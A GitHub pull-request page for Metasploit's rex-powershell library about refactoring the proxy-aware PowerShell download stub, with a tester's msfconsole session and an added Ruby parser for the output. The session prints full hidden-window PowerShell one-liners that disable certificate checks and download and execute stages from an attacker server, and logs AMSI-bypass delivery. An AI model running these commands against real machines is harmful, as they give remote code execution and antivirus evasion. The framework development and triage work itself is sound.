Closed cdelafuente-r7 closed 1 year ago
This change has fixed the issue previously being seen when testing https://github.com/rapid7/metasploit-framework/pull/17942. Thanks @cdelafuente-r7!
Testing checks out:
```text
msf6 > use multi/script/web_delivery
[*] Using configured payload windows/x64/exec
msf6 exploit(multi/script/web_delivery) > set payload payload/windows/x64/exec
payload => windows/x64/exec
msf6 exploit(multi/script/web_delivery) > set target 2
target => 2
msf6 exploit(multi/script/web_delivery) > set cmd calc.exe
[-] Unknown datastore option: cmd.
msf6 exploit(multi/script/web_delivery) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(multi/script/web_delivery) > set SRVHOST 172.16.199.1
SRVHOST => 172.16.199.1
msf6 exploit(multi/script/web_delivery) > options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  172.16.199.1     yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/x64/exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD       calc.exe         yes       The command string to execute
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)

Exploit target:

   Id  Name
   --  ----
   2   PSH

View the full module info with the info, or info -d command.

msf6 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Using URL: https://172.16.199.1:8080/PpsLxPdHAj
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/PpsLxPdHAj/s4y1988'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/PpsLxPdHAj/l8mjG5uXTteHBoh'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/PpsLxPdHAj/5vQTHmZDvYctdwk/1'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/PpsLxPdHAj'));
msf6 exploit(multi/script/web_delivery) > [*] 172.16.199.138 web_delivery - Delivering ForceTLS12 command (78 bytes)
[*] 172.16.199.138 web_delivery - Delivering Proxy Aware command (203 bytes)
[*] 172.16.199.138 web_delivery - Delivering AMSI Bypass 1/1(1601 bytes)
[*] 172.16.199.138 web_delivery - Powershell command length: 2101
[*] 172.16.199.138 web_delivery - Delivering Payload (2101 bytes)
msf6 exploit(multi/script/web_delivery) > set PSH-AmsiBypassSplit 5
PSH-AmsiBypassSplit => 5
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Using URL: https://172.16.199.1:8080/8PdWHFVF7ZLso
[*] Server started.
[*] Run the following command on the target machine:
msf6 exploit(multi/script/web_delivery) > [*] Splitting bypass protection script in 5 parts
powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/JAGui4aIHA'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/XsPNfTP'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/1'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/2'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/3'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/4'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/5'));IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso'));
[*] 172.16.199.138 web_delivery - Delivering ForceTLS12 command (78 bytes)
[*] 172.16.199.138 web_delivery - Delivering Proxy Aware command (203 bytes)
[*] 172.16.199.138 web_delivery - Delivering AMSI Bypass 1/5(751 bytes)
[*] 172.16.199.138 web_delivery - Delivering AMSI Bypass 2/5(392 bytes)
[*] 172.16.199.138 web_delivery - Delivering AMSI Bypass 3/5(81 bytes)
[*] 172.16.199.138 web_delivery - Delivering AMSI Bypass 4/5(30 bytes)
[*] 172.16.199.138 web_delivery - Delivering AMSI Bypass 5/5(351 bytes)
[*] 172.16.199.138 web_delivery - Powershell command length: 2069
[*] 172.16.199.138 web_delivery - Delivering Payload (2069 bytes)
```
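As an added triage example (not code from this PR, rex-powershell or Metasploit), the Ruby below parses a captured web_delivery one-liner of the shape shown in the test output into its ordered stage URLs, recovers the shared URIPATH prefix, reports how many parts the AMSI-bypass stage was split into, and flags the disabled certificate validation; the sample command is the page's second one-liner shortened to three split parts.

```ruby
require 'uri'

# Constructed sample: the second one-liner from the test output above, cut to 3 split parts.
SAMPLE_CMD = [
  "powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};",
  "IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/JAGui4aIHA'));",
  "IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/XsPNfTP'));",
  "IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/1'));",
  "IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/2'));",
  "IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso/Bc05MT7M/3'));",
  "IEX ((new-object Net.WebClient).DownloadString('https://172.16.199.1:8080/8PdWHFVF7ZLso'));"
].join

# Every URL the one-liner would fetch, in the order the stub fetches them.
def stage_urls(cmd)
  cmd.scan(/DownloadString\('([^']+)'\)/).flatten
end

# Summarise the delivery chain: the server base (scheme://host:port/URIPATH), the
# stage paths relative to it, and which stage was served as numbered parts.
def delivery_chain(cmd)
  urls = stage_urls(cmd)
  return nil if urls.empty?

  first = URI(urls.first)
  prefix = first.path.split('/')[1]             # the random URIPATH shared by all stages
  base = "#{first.scheme}://#{first.host}:#{first.port}/#{prefix}"
  stages = urls.map { |u| URI(u).path.delete_prefix("/#{prefix}") }

  # Paths of the form /<stage>/<n> are the pieces of one split stage.
  split_parts = stages.each_with_object({}) do |path, parts|
    m = path.match(%r{\A/([^/]+)/(\d+)\z})
    next unless m
    (parts[m[1]] ||= []) << m[2].to_i
  end

  {
    base: base,
    stages: stages,
    split_parts: split_parts,
    # A split is complete only if its parts are exactly 1..n in order.
    split_complete: split_parts.values.all? { |p| p == (1..p.size).to_a },
    cert_validation_disabled: cmd.include?('ServerCertificateValidationCallback={$true}')
  }
end

puts delivery_chain(SAMPLE_CMD).inspect if $PROGRAM_NAME == __FILE__
```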
This PR is a simple update to the method responsible for generating the PowerShell stub that uses the default system web proxy and credentials. The logic has been extracted and moved to a new method `self.proxy_aware`. The original method `self.proxy_aware_download_and_exec_string` now calls it before concatenating the "download and exec" logic. These changes are needed by this Metasploit PR.
Testing
The easiest way to test this is to follow the steps listed in this PR.